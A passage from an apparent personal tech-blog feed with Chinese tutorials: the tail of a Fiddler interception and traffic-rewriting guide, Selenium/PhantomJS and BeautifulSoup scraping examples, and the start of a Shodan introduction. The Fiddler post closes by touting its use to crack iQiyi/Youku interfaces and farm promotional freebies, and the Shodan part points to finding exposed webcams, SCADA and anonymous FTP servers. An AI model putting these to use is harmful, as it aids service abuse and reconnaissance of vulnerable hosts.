FiddlerObject.alert(“我是右键菜单”); // 根据需要定制<br>  }</p></blockquote><p>   右键菜单不好截图，就不截图啦~~~~<br>   子菜单和右键菜单自己新建一个类就OK了。</p><p>   <strong>二、限速</strong><br>   fiddler提供了一个功能，让我们模拟低速网路环境。启用方法如下：Rules  → Performances → Simulate Modem  Speeds。勾选之后，你会发现你的网路瞬间慢下来了很多。至于慢下来后网络速度是多少，则由CustomRules.js 中如下程序控制的：</p><blockquote><p> var m_SimulateModem: boolean = true;<br>  …<br>  if (m_SimulateModem) {<br>     // 500毫秒/KB（上传）<br>      oSession[“request-trickle-delay”] = “500”;<br> // 150毫秒/KB（下载）<br>      oSession[“response-trickle-delay”] = “150”;<br>  }</p></blockquote><p>   <strong>三、AutoResponder （自动替换功能）</strong><br>   方法是点下Fiddler 右上的AutoResponder ，勾选Enable automatic responses 和Unmatched requests passthrough ，按下右边的Add ；</p><p>  再将下方的Rule Editor 第一行修改为线上档案位址（线上档案位址也可以使用Regular Expression ，开头加上regex: 即可。）</p><p>  按下Rule Editor 第二行右边的箭头，选择Find a file … ；选择要替换成的本机端档案，按下右边的SAVE ，大功告成！</p><p>  <img src="http://static.oschina.net/uploads/img/201504/12015848_MAKK.png" alt="img"></p><p>  将线上档案替换成另一个线上档案，步骤几乎<a href="https://www.baidu.com/s?wd=一模一样&amp;tn=24004469_oem_dg&amp;rsv_dl=gh_pl_sl_csd" target="_blank" rel="noopener">一模一样</a>，差别仅在Rule Editor 第二行填入的是另一线上档案位址：</p><p>  <img src="http://static.oschina.net/uploads/img/201504/12015848_Wiqd.png" alt="img"></p><p>  更多AutoResponder的说明请参考Fiddler官方文件- AutoResponder Reference 。</p><p>  （PS：AutoResponder 这个网上有比较多的教程，我直接复制的了。）</p><p>  <strong>四：命令调试（和OD的命令调试操作基本相同）</strong></p><p>  4.1替换 Request Host。</p><p>  关键函数：urlreplace</p><p>  比如：urlreplace <a href="http://www.baidu.com" target="_blank" rel="noopener">www.baidu.com</a> <a href="http://www.360.com" target="_blank" rel="noopener">www.360.com</a></p><p>  按下Enter ，所有原先发到百度的HTTP Request 就转发到360 了。</p><pre><code> ![img](https://attach.52pojie.cn/forum/201901/25/123822ksgz891tprtwb5t4.png)     </code></pre><p>  要清除转发，请在同一位置输入：</p><p>  urlreplace</p><p>  另外script也可以做到：</p><blockquote><p>if ( oSession . HostnameIs ( ‘<a href="http://www.baidu.com&#39;" target="_blank" rel="noopener">www.baidu.com&#39;</a> ) )<br>    oSession . hostname = ‘<a href="http://www.360.com&#39;" target="_blank" rel="noopener">www.360.com&#39;</a> ;</p></blockquote><p>  4.2 下断点（和OD、VS调试一样的哦）</p><blockquote><p>命令介绍：<br> bpu在请求开始时中断,<br> bpafter在响应到达时中断,<br> bps在特定http状态码时中断,<br> bpv/bpm在特定请求method时中断。</p></blockquote><p>  如：</p><p>  bpu <a href="http://www.baidu.com/52pj/" target="_blank" rel="noopener">www.baidu.com/52pj/</a>狂暴补师亚丝娜 </p><p>  这样既可在访问这个网址的时候自动下断点哦。</p><p>  4.3Fiddler其他内置命令(4.3为转载）</p><ul><li>secret</li></ul><blockquote><p>选择所有相应类型（指content-type）为指定类型的HTTP请求，如选择图片，使用命令select  image.而select css则可以选择所有相应类型为css的请求，select  html则选择所有响应为HTML的请求（怎么样，是不是跟SQL语句很像？）。</p></blockquote><ul><li>allbut</li></ul><blockquote><p>allbut命令用于选择所有响应类型不是给定类型的HTTP请求。如allbut   image用于选择所有相应类型不是图片的session(HTTP请求)，该命令还有一个别名keeponly.需要注意的是，keeponly和allbut命令是将不是该类型的session删除，留下的都是该类型的响应。因此，如果你执行allbut  xxxx（不存在的类型），实际上类似与执行cls命令（删除所有的session, ctrl+x快捷键也是这个作用）</p></blockquote><ul><li>?text</li></ul><blockquote><p>选择所有 URL 匹配问号后的字符的全部 session</p></blockquote><ul><li>>size 和 &lt;size命令</li></ul><blockquote><p>选择响应大小大于某个大小（单位是b）或者小于某个大小的所有HTTP请求</p></blockquote><ul><li>=status命令</li></ul><blockquote><p>选择响应状态等于给定状态的所有HTTP请求。</p></blockquote><p>   例如，选择所有状态为200的HTTP请求：=200</p><ul><li>@host命令</li></ul><blockquote><p>选择包含指定 HOST 的全部 HTTP请求。例如：@csdn.net</p></blockquote><p>  <strong>五、“逆向”</strong></p><p>  这里只能简单提及一下，当你发现下断点的网址过后，可以使用ctrl+F的方式，就行搜索该网址，既可看是什么接口返回的该地址，也就是简单的逆向！</p><p>  最后：</p><p>  熟练掌握Fiddler，能够<a href="https://www.52pojie.cn" target="_blank" rel="noopener">破解</a>爱奇艺、优酷等永久不失效的接口，也可薅羊毛（饿了么等），具体就要看大家的掌握程度了！破解游戏啥的就不说了。</p>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python网络爬虫实战之七：动态网页爬取案例实战 Selenium + PhantomJS</title>
      <link href="/Coderzgh.github.io/2019/05/19/python-crawler-static-sample-7/"/>
      <url>/Coderzgh.github.io/2019/05/19/python-crawler-static-sample-7/</url>
      
        <content type="html"><![CDATA[<ul><li><h2 id="正文："><a href="#正文：" class="headerlink" title="正文："></a>正文：</h2><h2 id="一、Selenium"><a href="#一、Selenium" class="headerlink" title="一、Selenium"></a>一、Selenium</h2><h3 id="1、Selenium是什么"><a href="#1、Selenium是什么" class="headerlink" title="1、Selenium是什么"></a>1、Selenium是什么</h3><p>Selenium 是什么？一句话，自动化测试工具。它支持各种浏览器，包括 Chrome，Safari，Firefox 等主流界面式浏览器，如果你在这些浏览器里面安装一个 Selenium 的插件，那么便可以方便地实现Web界面的测试。换句话说叫 Selenium 支持这些浏览器驱动。</p><h3 id="2、安装Selenium"><a href="#2、安装Selenium" class="headerlink" title="2、安装Selenium"></a>2、安装Selenium</h3><ul><li>方法一：pip install selenium</li><li>方法二：<a href="https://pypi.org/simple/selenium/" target="_blank" rel="noopener">下载源码</a>后解压，进入解压后的目录，执行 python setup.py install</li></ul><h3 id="3、安装浏览器驱动"><a href="#3、安装浏览器驱动" class="headerlink" title="3、安装浏览器驱动"></a>3、安装浏览器驱动</h3><p>使用谷歌浏览器，则下载<a href="https://sites.google.com/a/chromium.org/chromedriver/downloads" target="_blank" rel="noopener">chromedriver.exe</a>，下载成功后，把chromedriver.exe复制到Python安装路径下的Scripts目录中</p><p>使用其他浏览器方法类似</p><h3 id="4、快速体验Selenium"><a href="#4、快速体验Selenium" class="headerlink" title="4、快速体验Selenium"></a>4、快速体验Selenium</h3><p>使用pyhon打开浏览器，并自动访问百度首页</p><pre><code>from selenium import webdriverbrowser = webdriver.Chrome()browser.get(&#39;http://www.baidu.com/&#39;)</code></pre><p>打开浏览器，并自动在百度中搜索“Python”关键词</p><pre><code>from selenium import webdriverfrom selenium.webdriver.common.keys import Keysbrowser = webdriver.Chrome()browser.get(&#39;https://www.baidu.com&#39;)input = browser.find_element_by_id(&#39;kw&#39;)input.send_keys(&#39;Python&#39;)input.send_keys(Keys.ENTER)</code></pre><h3 id="5、爬取网页代码：自动在百度中搜索“Python”关键词后的网页"><a href="#5、爬取网页代码：自动在百度中搜索“Python”关键词后的网页" class="headerlink" title="5、爬取网页代码：自动在百度中搜索“Python”关键词后的网页"></a>5、爬取网页代码：自动在百度中搜索“Python”关键词后的网页</h3><pre><code>from selenium import webdriverfrom selenium.webdriver.common.by import Byfrom selenium.webdriver.common.keys import Keysfrom selenium.webdriver.support import expected_conditions as ECfrom selenium.webdriver.support.wait import WebDriverWaitbrowser = webdriver.Chrome()try:    browser.get(&#39;https://www.baidu.com&#39;)    input = browser.find_element_by_id(&#39;kw&#39;)    input.send_keys(&#39;Python&#39;)    input.send_keys(Keys.ENTER)    wait = WebDriverWait(browser, 10)    wait.until(EC.presence_of_element_located((By.ID, &#39;content_left&#39;)))    print(browser.current_url)    print(browser.get_cookies())    print(browser.page_source)finally:    browser.close()</code></pre><p>Selenium的更详细资料可参考<a href="http://selenium-python-zh.readthedocs.io/en/latest/index.html" target="_blank" rel="noopener">Selenium with Python中文翻译文档</a></p><h2 id="二、PhantomJS"><a href="#二、PhantomJS" class="headerlink" title="二、PhantomJS"></a>二、PhantomJS</h2><h3 id="1、PhantomJs是什么？"><a href="#1、PhantomJs是什么？" class="headerlink" title="1、PhantomJs是什么？"></a>1、PhantomJs是什么？</h3><p>PhantomJs是什么？是一个基于Webkit的”无界面”(headless)浏览器，它会把网站加载到内存并执行页面上的JavaScript，因为不会展示图形界面，所以运行起来比完整的浏览器更高效。</p><p>爬取动态网页的时候，通常是PhantomJS 用来渲染解析JS，Selenium 用来驱动以及与 Python 的对接，Python 进行后期的处理，完美的三剑客！</p><h3 id="2、安装PhantomJS"><a href="#2、安装PhantomJS" class="headerlink" title="2、安装PhantomJS"></a>2、安装PhantomJS</h3><p><a href="http://phantomjs.org/download.html" target="_blank" rel="noopener">PhantomJS官方下载地址</a><br> 下载成功后，解压得到phantomjs-2.1.1-windows文件夹，bin目录下的phantomjs.exe文件才是我们真正需要的，example目录下的文件时官方示例代码。</p><p>可以通过设置环境变量来使用PhantomJS，也可以通过指定路径来操作。设置环境变量的方法式把phantomjs-2.1.1-windows的bin配置到path中，比如我的路径是D:\python\PythonLibs\phantomjs-2.1.1-windows\bin</p><p>通过输出PhantomJS来检验PhantomJS是否可用：</p><ul><li>如果配置了系统环境变量，在cmd控制台直接输入：phantomjs -v</li><li>如果没有配置系统全局变量，则进入到phantomjs.exe文件的所在目录，比如：D:\Python\PythonLibs\phantomjs-2.1.1-windows\bin，然后再执行 phantomjs -v</li></ul><h3 id="3、快速体验PhantomJS"><a href="#3、快速体验PhantomJS" class="headerlink" title="3、快速体验PhantomJS"></a>3、快速体验PhantomJS</h3><p>使用方法：进入phantomjs.exe所在目录，然后执行 phantomjs 文件绝对路径</p><p>执行官方示例中的hello.js文件（假设没有配置系统全局变量）</p><pre><code>D:\DataguruPyhton&gt;cd D:\python\PythonLibs\phantomjs-2.1.1-windows\binD:\Python\PythonLibs\phantomjs-2.1.1-windows\bin&gt;phantomjs D:\python\PythonLibs\phantomjs-2.1.1-windows\examples\hello.js运行结果是：Hello, world!</code></pre><p>其中hello.js中的代码是：</p><pre><code>&quot;use strict&quot;;console.log(&#39;Hello, world!&#39;);phantom.exit();</code></pre><p>执行官方示例中的version.js文件（假设没有配置系统全局变量）</p><pre><code>D:\Python\PythonLibs\phantomjs-2.1.1-windows\bin&gt;phantomjs D:\python\PythonLibs\phantomjs-2.1.1-windows\examples\version.js运行结果是：using PhantomJS version 2.1.1</code></pre><p>其中version.js中的代码是：</p><pre><code>&quot;use strict&quot;;console.log(&#39;using PhantomJS version &#39; +  phantom.version.major + &#39;.&#39; +  phantom.version.minor + &#39;.&#39; +  phantom.version.patch);phantom.exit();</code></pre><p>PhantomJS更详细资料可参考<a href="http://phantomjs.org/documentation/" target="_blank" rel="noopener">PhantomJS官方文档</a></p><h2 id="三、Selenium-PhantomJS结合使用"><a href="#三、Selenium-PhantomJS结合使用" class="headerlink" title="三、Selenium+PhantomJS结合使用"></a>三、Selenium+PhantomJS结合使用</h2><p>Selenium + PhantomJS 实例一</p><pre><code>from selenium import webdriver# 调用键盘按键操作需要引入keys包from selenium.webdriver.common.keys import Keys# 调用指定的PhantomJS浏览器创建浏览器对象（没有在环境变量中指定PhantomJS位置）driver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)# 调用环境变量指定的PhantomJS浏览器创建浏览器对象（如果已经在环境变量中指定了PhantomJS位置）# driver = webdriver.PhantomJS()driver.set_window_size(1366, 768)# get方法会一直等到页面加载，然后才会继续程序，通常测试会在这里选择time.sleep(2)driver.get(&quot;http://www.baidu.com/&quot;)# 获取页面名为wraper的id标签的文本内容data = driver.find_element_by_id(&#39;wrapper&#39;).text# 打印数据内容print(data)# 把百度设为主页关于百度About  Baidu百度推广# ©2018 Baidu 使用百度前必读 意见反馈 京ICP证030173号  京公网安备11000002000001号print(driver.title)  # result: 百度一下，你就知道# 生成页面快照并保存driver.save_screenshot(r&#39;D:\DataguruPyhton\PythonSpider\images\baidu.png&#39;)# id=&quot;kw&quot;是百度搜索输入框，输入字符串&quot;长城&quot;driver.find_element_by_id(&#39;kw&#39;).send_keys(u&#39;长城&#39;)# id=&quot;su&quot;是百度搜索按钮，click()是模拟点击driver.find_element_by_id(&#39;su&#39;).click()# 获取新的页面快照driver.save_screenshot(r&#39;D:\DataguruPyhton\PythonSpider\images\长城.png&#39;)# 打印网页渲染后的源代码print(driver.page_source)# 获取当前页面Cookieprint(driver.get_cookies())driver.quit()</code></pre><p>Selenium + PhantomJS 实例二</p><pre><code>from selenium import webdriverimport time# 调用键盘按键操作需要引入keys包from selenium.webdriver.common.keys import Keys# 调用指定的PhantomJS浏览器创建浏览器对象（没有在环境变量中指定PhantomJS位置）driver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)# 调用环境变量指定的PhantomJS浏览器创建浏览器对象（如果已经在环境变量中指定了PhantomJS位置）# driver = webdriver.PhantomJS()driver.set_window_size(1366, 768)# get方法会一直等到页面加载，然后才会继续程序，通常测试会在这里选择time.sleep(2)driver.get(&quot;http://www.baidu.com/&quot;)# id=&quot;kw&quot;是百度搜索输入框，输入字符串&quot;情人节&quot;driver.find_element_by_id(&#39;kw&#39;).send_keys(u&#39;情人节&#39;)# ctrl+a全选输入框内容driver.find_element_by_id(&#39;kw&#39;).send_keys(Keys.CONTROL, &#39;a&#39;)# ctrl+x剪切输入框内容driver.find_element_by_id(&#39;kw&#39;).send_keys(Keys.CONTROL, &#39;x&#39;)# 输入框重新输入内容driver.find_element_by_id(&#39;kw&#39;).send_keys(&#39;鲜花&#39;)# 模拟Enter回车键driver.find_element_by_id(&#39;su&#39;).send_keys(Keys.RETURN)time.sleep(5)# 清空输入框内容driver.find_element_by_id(&#39;kw&#39;).clear()# 生成新的页面快照driver.save_screenshot(r&#39;D:\DataguruPyhton\PythonSpider\images\鲜花.png&#39;)# 获取当前urlprint(driver.current_url)driver.quit()</code></pre><p>Selenium + PhantomJS 实例三：爬取包含Ajax的动态网页数据</p><pre><code>## Selenium+PhantomJS爬取包含Ajax的动态网页数据：通过手动延时from selenium import webdriverimport timedriver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)driver.get(&quot;http://pythonscraping.com/pages/javascript/ajaxDemo.html&quot;)# driver.page_sourcetime.sleep(3)print(driver.find_element_by_id(&quot;content&quot;).text)driver.close()</code></pre><p>完善后的代码</p><pre><code>## Selenium+PhantomJS爬取包含Ajax的动态网页数据：通过检查页面是否加载完毕from selenium.webdriver.common.by import Byfrom selenium.webdriver.support.ui import WebDriverWaitfrom selenium.webdriver.support import expected_conditions as ECdriver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)driver.get(&quot;http://pythonscraping.com/pages/javascript/ajaxDemo.html&quot;)try:    element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, &quot;loadedButton&quot;)))finally:    print(driver.find_element_by_id(&quot;content&quot;).text)    driver.close()</code></pre><p>Selenium + PhantomJS 实例四：爬取重定向的动态网页数据</p><p><code>`</code><br>from selenium import webdriver<br>from selenium.common.exceptions import StaleElementReferenceException</p></li></ul><p>  def waitForLoad(driver):<br>      elem = driver.find_element_by_tag_name(“html”)<br>      count = 0<br>      while True:<br>          count += 1<br>          if count &gt; 20:<br>              print(“Timing out after 10 seconds and returning”)<br>              return<br>          time.sleep(.5)<br>          try:<br>              elem == driver.find_element_by_tag_name(“html”)<br>          except StaleElementReferenceException:<br>              return</p><p>  driver = webdriver.PhantomJS(executable_path=r’D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs’)<br>  driver.get(“<a href="http://pythonscraping.com/pages/javascript/redirectDemo1.html&quot;" target="_blank" rel="noopener">http://pythonscraping.com/pages/javascript/redirectDemo1.html&quot;</a>)<br>  waitForLoad(driver)<br>  print(driver.page_source)</p><pre><code>  ## 四、Selenium+PhantomJS使用时报错原因及解决方案  ### 1、现象  报错日志：</code></pre><p>  UserWarning: Selenium support for PhantomJS has been deprecated, please use headless versions of Chrome or Firefox instead warnings.warn(‘Selenium support for PhantomJS has been deprecated, please use headless ‘</p><pre><code>  就是说selenium已经放弃PhantomJS，了，建议使用火狐或者谷歌无界面浏览器。  ### 2、解决方案  - 方案一：selenium版本降级，卸载当前selenium，重现安装低版本的selenium，比如pip install selenium==3.8.0  - 方案二：使用 Selenium + Headless Firefox 或 Selenium + Headless Chrome  &gt; 将在下篇文章中详细介绍 Selenium + Headless Chrome  ## 五、本篇文章中的代码，运行环境  - Python 3.6.4  - selenium 3.8.0  - phantomjs-2.1.1-windows  - chromedriver.exe  ## 六、彩蛋：pillow对图片进行处理  为以后读取图片验证码铺垫</code></pre><h1 id="需要先安装pillow-安装方法：pip-install-pillow"><a href="#需要先安装pillow-安装方法：pip-install-pillow" class="headerlink" title="需要先安装pillow,安装方法：pip install pillow"></a>需要先安装pillow,安装方法：pip install pillow</h1><p>  from PIL import Image, ImageFilter</p><p>  kitten = Image.open(u”D:\DataguruPyhton\PythonSpider\images\girl1.jpg”)<br>  blurryKitten = kitten.filter(ImageFilter.GaussianBlur)<br>  blurryKitten.save(u”D:\DataguruPyhton\PythonSpider\images\girl2.jpg”)<br>  blurryKitten.show()<br>  <code>`</code></p>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> Selenium </tag>
            
            <tag> PhantomJS </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python网络爬虫实战之六：静态网页爬取案例实战</title>
      <link href="/Coderzgh.github.io/2019/05/18/python-crawler-static-sample-6/"/>
      <url>/Coderzgh.github.io/2019/05/18/python-crawler-static-sample-6/</url>
      
        <content type="html"><![CDATA[<ul><li><h2 id="正文："><a href="#正文：" class="headerlink" title="正文："></a>正文：</h2><h2 id="预备知识点：正则表达式之-pattern-、pattern-、-pattern-、-pattern"><a href="#预备知识点：正则表达式之-pattern-、pattern-、-pattern-、-pattern" class="headerlink" title="预备知识点：正则表达式之 pattern+?、pattern*?、(?!pattern)、(?:pattern)"></a>预备知识点：正则表达式之 pattern+?、pattern*?、(?!pattern)、(?:pattern)</h2><h3 id="pattern-、pattern"><a href="#pattern-、pattern" class="headerlink" title="pattern+?、pattern*?"></a>pattern+?、pattern*?</h3><p>这两个比较常用，表示懒惰匹配，即匹配符合条件的尽量短的字符串。默认情况下 + 和 * 是贪婪匹配，即匹配尽可能长的字符串，在它们后面加上 ? 表示想要进行懒惰匹配。</p><h3 id="pattern"><a href="#pattern" class="headerlink" title="(?!pattern)"></a>(?!pattern)</h3><p>表示一个过滤条件，若字符串符合 pattern 则将其过滤掉。在分析日志时很有用，例如想过滤掉包含 info 标记的日志可以写 ^(?!.<em>info).</em>$。</p><h3 id="pattern-1"><a href="#pattern-1" class="headerlink" title="(?:pattern)"></a>(?:pattern)</h3><p>这条规则主要是为了优化性能，对匹配没有影响。它表示括号内的子表达式匹配的结果不需要返回也不会被 <img src="https://math.jianshu.com/math?formula=1" alt="1">2 之类的反向引用。</p><h2 id="案例实战一"><a href="#案例实战一" class="headerlink" title="案例实战一"></a>案例实战一</h2><p>获取网页<a href="https://en.wikipedia.org/wiki/Kevin_Bacon" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Kevin_Bacon</a>中的词条url链接</p><h3 id="尝试1"><a href="#尝试1" class="headerlink" title="尝试1"></a>尝试1</h3><pre><code>## 尝试1：爬取网页内容from urllib.request import urlopenfrom bs4 import BeautifulSouphtml = urlopen(r&#39;https://en.wikipedia.org/wiki/Kevin_Bacon&#39;)bsObj = BeautifulSoup(html, &#39;lxml&#39;)print(bsObj.prettify())</code></pre><h3 id="尝试2"><a href="#尝试2" class="headerlink" title="尝试2"></a>尝试2</h3><pre><code>## 尝试2:抓取网页中的 a 标签，且以 href 开头的所有url链接from urllib.request import urlopenfrom bs4 import BeautifulSouphtml = urlopen(r&#39;https://en.wikipedia.org/wiki/Kevin_Bacon&#39;)bsObj = BeautifulSoup(html, &#39;lxml&#39;)allLinks = bsObj.findAll(&quot;a&quot;)print(len(allLinks))  # 780for link in allLinks:    if &quot;href&quot; in link.attrs:        print(link.attrs[&quot;href&quot;])</code></pre><blockquote><p>通过分析“尝试2”中的数据，发现如下规律：</p><p>1、id在bodyContent的div标签中；</p><p>2、url不包含冒号；</p><p>3、url以/wiki/开头</p></blockquote><h3 id="正式提取"><a href="#正式提取" class="headerlink" title="正式提取"></a>正式提取</h3><pre><code>## 正式提取维基中的词条urlfrom urllib.request import urlopenfrom bs4 import BeautifulSoupimport rehtml = urlopen(r&#39;https://en.wikipedia.org/wiki/Kevin_Bacon&#39;)bsObj = BeautifulSoup(html, &#39;lxml&#39;)allLinks = bsObj.find(&#39;div&#39;, {&#39;id&#39;: &#39;bodyContent&#39;}).findAll(&#39;a&#39;, href=re.compile(&quot;^(/wiki/)((?!:).)*$&quot;))# allLinks# allLinks[0]# # result: &lt;a class=&quot;mw-disambig&quot; href=&quot;/wiki/Kevin_Bacon_(disambiguation)&quot; title=&quot;Kevin Bacon (disambiguation)&quot;&gt;Kevin Bacon (disambiguation)&lt;/a&gt;# allLinks[0].text# # result: &#39;Kevin Bacon (disambiguation)&#39;# allLinks[0].attrs[&#39;class&#39;]# # result: [&#39;mw-disambig&#39;]# allLinks[0].attrs[&#39;href&#39;]# # result: &#39;/wiki/Kevin_Bacon_(disambiguation)&#39;# allLinks[0].attrs[&#39;title&#39;]# # result: &#39;Kevin Bacon (disambiguation)&#39;# print(len(allLinks))  # 380for link in allLinks:    if &#39;href&#39; in link.attrs:        print(link.attrs[&#39;href&#39;])</code></pre><h2 id="案例实战二"><a href="#案例实战二" class="headerlink" title="案例实战二"></a>案例实战二</h2><p>获取网页<a href="https://en.wikipedia.org/wiki/Kevin_Bacon" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Kevin_Bacon</a>中的词条url链接以及关联页面中的词条url</p><p><code>`</code><br>from urllib.request import urlopen<br>from bs4 import BeautifulSoup<br>import re<br>import datetime<br>import random</p></li></ul><p>  def getLinks(articleUrl):<br>      html = urlopen(“<a href="https://en.wikipedia.org&quot;" target="_blank" rel="noopener">https://en.wikipedia.org&quot;</a> + articleUrl)<br>      bsObj = BeautifulSoup(html, ‘lxml’)<br>      return bsObj.find(‘div’, {‘id’: ‘bodyContent’}).findAll(‘a’, href=re.compile(“^(/wiki/)((?!:).)*$”))</p><p>  links = getLinks(“/wiki/Kevin_Bacon”)<br>  random.seed(datetime.datetime.now())  # 设置随机因子为系统时间，这样再使用随机函数时就不会取到重复值了<br>  while len(links) &gt; 0:<br>      newArticle = links[random.randint(0, len(links) - 1)].attrs[“href”]<br>      print(newArticle)<br>      links = getLinks(newArticle)</p><pre><code>  &gt; 上述代码存在两个隐患：  &gt;  隐患1，有可能会从A页面到B页面再到A页面；  &gt;  隐患2，没有做异常处理  ## 案例实战三  获取词条以及关联词条的url、标题、概要</code></pre><p>  pages = set()  # url容器，作用：收集新的url链接；剔除已抓取的url</p><p>  def getLinks(pageUrl):<br>      global pages  # 设为全局变量<br>      html = urlopen(“<a href="https://en.wikipedia.org&quot;" target="_blank" rel="noopener">https://en.wikipedia.org&quot;</a> + pageUrl)<br>      bsObj = BeautifulSoup(html, “lxml”)<br>      try:</p><pre><code>      # 维基词条页面的特征：      # 1、所有的标题都在h1-&gt;span标签里，而且只有一个标题标签      # 2、正文文字在div#bodyContent标签里；第一段文字 div#mw-content-text-&gt;p      # 3、编辑链接只出现在词条页面上，位于li#ca-edit标签里的 li#caedit-&gt;span-&gt;a      print(&quot;https://en.wikipedia.org&quot; + pageUrl)      print(bsObj.h1.get_text())      print(bsObj.find(id=&quot;mw-content-text&quot;).findAll(&quot;p&quot;)[0])      print(bsObj.find(id=&quot;ca-edit&quot;).find(&quot;span&quot;).find(&quot;a&quot;).attrs[&#39;href&#39;])  except AttributeError:      print(&quot;This page is missing something! No worries though!&quot;)  allLinks = bsObj.find_all(&quot;a&quot;, href=re.compile(&quot;^(/wiki/)((?!:).)*$&quot;))  for link in allLinks:      if &#39;href&#39; in link.attrs:          newPage = link.attrs[&#39;href&#39;]          print(&quot;------------------------\n&quot; + newPage)          pages.add(newPage)          getLinks(newPage)</code></pre><p>  getLinks(“/wiki/Farouk_Topan”)</p><pre><code>  ## 案例实战四  通过定义函数，获取页面内的所有外链</code></pre><p>  from urllib.request import urlopen<br>  from bs4 import BeautifulSoup<br>  import datetime<br>  import random<br>  import re</p><p>  random.seed(datetime.datetime.now())<br>  allExtLinks = set()<br>  allIntLinks = set()</p><h1 id="获取页面所有内链的列表"><a href="#获取页面所有内链的列表" class="headerlink" title="获取页面所有内链的列表"></a>获取页面所有内链的列表</h1><p>  def getInternalLinks(bsObj, includeUrl):<br>      internalLinks = []</p><pre><code>  # Finds all links that begin with a &quot;/&quot;  for link in bsObj.findAll(&quot;a&quot;, href=re.compile(&quot;^(/.*&quot; + includeUrl + &quot;)&quot;)):      if link.attrs[&quot;href&quot;] is not None:          if link.attrs[&quot;href&quot;] not in internalLinks:              internalLinks.append(link.attrs[&quot;href&quot;])  return internalLinks</code></pre><h1 id="获取所有外链的列表"><a href="#获取所有外链的列表" class="headerlink" title="获取所有外链的列表"></a>获取所有外链的列表</h1><p>  def getExternallLinks(bsObj, excludeUrl):<br>      externalLinks = []</p><pre><code>  # Finds all links that start with &quot;http&quot; or &quot;www&quot; that do not contain the current URL  for link in bsObj.findAll(&quot;a&quot;, href=re.compile(&quot;^(http|www)((?!&quot; + excludeUrl + &quot;).)*$&quot;)):      if link.attrs[&quot;href&quot;] is not None:          if link.attrs[&#39;href&#39;] not in externalLinks:              externalLinks.append(link.attrs[&#39;href&#39;])  return externalLinks</code></pre><h1 id="url拆分"><a href="#url拆分" class="headerlink" title="url拆分"></a>url拆分</h1><p>  def splitAddress(address):<br>      addressParts = address.replace(“http://“, “”).split(“/“)<br>      return addressParts</p><h1 id="Collects-a-list-of-all-external-URLs-found-on-the-site"><a href="#Collects-a-list-of-all-external-URLs-found-on-the-site" class="headerlink" title="Collects a list of all external URLs found on the site"></a>Collects a list of all external URLs found on the site</h1><p>  def getAllExternalLinks(siteUrl):<br>      html = urlopen(siteUrl)<br>      bsObj = BeautifulSoup(html, ‘lxml’)<br>      internalLinks = getInternalLinks(bsObj, splitAddress(siteUrl)[0])<br>      externalLinks = getExternallLinks(bsObj, splitAddress(siteUrl)[0])</p><pre><code>  for link in externalLinks:      if link not in allExtLinks:          allExtLinks.add(link)          print(link)  for link in internalLinks:      if link not in allIntLinks:          allIntLinks.add(link)          getAllExternalLinks(&quot;http:&quot; + link)</code></pre><p>  getAllExternalLinks(“<a href="http://oreilly.com&quot;" target="_blank" rel="noopener">http://oreilly.com&quot;</a>)<br>  <code>`</code></p>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>什么是 Shodan？</title>
      <link href="/Coderzgh.github.io/2019/05/17/how-shodan/"/>
      <url>/Coderzgh.github.io/2019/05/17/how-shodan/</url>
      
        <content type="html"><![CDATA[<h2 id="什么是-Shodan？"><a href="#什么是-Shodan？" class="headerlink" title="什么是 Shodan？"></a>什么是 Shodan？</h2><p>首先，Shodan 是一个搜索引擎，但它与 Google 这种搜索网址的搜索引擎不同，Shodan 是用来搜索网络空间中在线设备的，你可以通过 Shodan 搜索指定的设备，或者搜索特定类型的设备，其中 Shodan 上最受欢迎的搜索内容是：webcam，linksys，cisco，netgear，SCADA等等。</p><p><strong>那么 Shodan 是怎么工作的呢？Shodan 通过扫描全网设备并抓取解析各个设备返回的 banner 信息，通过了解这些信息 Shodan 就能得知网络中哪一种 Web 服务器是最受欢迎的，或是网络中到底存在多少可匿名登录的 FTP 服务器。</strong></p><h2 id="基本用法"><a href="#基本用法" class="headerlink" title="基本用法"></a>基本用法</h2><p>这里就像是用 Google 一样，在主页的搜索框中输入想要搜索的内容即可，例如下面我搜索 “SSH”：</p><p><a href="http://image.3001.net/images/20161128/14803149659337.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803149659337.png!small" alt="27-1.png"></a></p><p>上图的搜索结果包含两个部分，左侧是大量的汇总数据包括：</p><ul><li>Results map – 搜索结果展示地图</li><li>Top services (Ports) – 使用最多的服务/端口</li><li>Top organizations (ISPs) – 使用最多的组织/ISP</li><li>Top operating systems – 使用最多的操作系统</li><li>Top products (Software name) – 使用最多的产品/软件名称</li></ul><p>随后，在中间的主页面我们可以看到包含如下的搜索结果：</p><ul><li>IP 地址</li><li>主机名</li><li>ISP</li><li>该条目的收录收录时间</li><li>该主机位于的国家</li><li>Banner 信息</li></ul><p>想要了解每个条目的具体信息，只需要点击每个条目下方的 details 按钮即可。此时，URL 会变成这种格式 <code>https://www.shodan.io/host/[IP]</code>，所以我们也可以通过直接访问指定的 IP 来查看详细信息。</p><p><a href="http://image.3001.net/images/20161128/14803149873250.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803149873250.png!small" alt="27-2.png"></a></p><p>上图中我们可以从顶部在地图中看到主机的物理地址，从左侧了解到主机的相关信息，右侧则包含目标主机的端口列表及其详细信息。</p><h3 id="使用搜索过滤"><a href="#使用搜索过滤" 